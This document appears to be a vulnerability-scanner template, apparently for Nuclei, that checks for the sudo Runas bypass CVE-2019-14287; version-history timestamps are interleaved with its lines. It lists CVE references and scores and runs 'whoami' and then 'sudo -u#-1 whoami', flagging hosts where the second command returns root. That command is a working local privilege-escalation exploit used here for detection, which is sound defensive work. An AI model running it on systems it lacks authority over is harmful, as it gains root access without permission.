2023-12-29 13:17:50 +00:00
id : CVE-2019-14287
info :
name : Sudo <= 1.8.27 - Security Bypass
author : daffainfo
severity : high
description : |
In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.
reference :
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
- https://www.exploit-db.com/exploits/47502
2024-03-04 08:20:22 +00:00
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html
- http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
cve-id : CVE-2019-14287
cwe-id : CWE-755
2024-03-23 09:28:19 +00:00
epss-score : 0.30814
epss-percentile : 0.96854
2024-03-04 08:20:22 +00:00
cpe : cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
2023-12-29 13:17:50 +00:00
metadata :
verified : true
max-request : 2
2024-03-04 08:20:22 +00:00
vendor : sudo_project
product : sudo
2024-06-07 10:04:29 +00:00
tags : packetstorm,cve,cve2019,sudo,code,linux,privesc,local,canonical,sudo_project
2023-12-29 13:17:50 +00:00
self-contained : true
code :
- engine :
- sh
- bash
source : |
whoami
- engine :
- sh
- bash
source : |
sudo -u#-1 whoami
matchers :
- type : dsl
dsl :
- '!contains(code_1_response, "root")'
- 'contains(code_2_response, "root")'
condition : and
2024-06-08 16:02:17 +00:00
# digest: 490a0046304402207c6a17c6dcfa5e1c0705af985ede699d418ae7488b1f1a1d29faf8b7dcc7e8920220008d95bc160ad21eb5224ab61a5f4ffc0c7ae1d1b6513f4add54a8e1624df386:922c64590222798bb761d5b6d8e72950
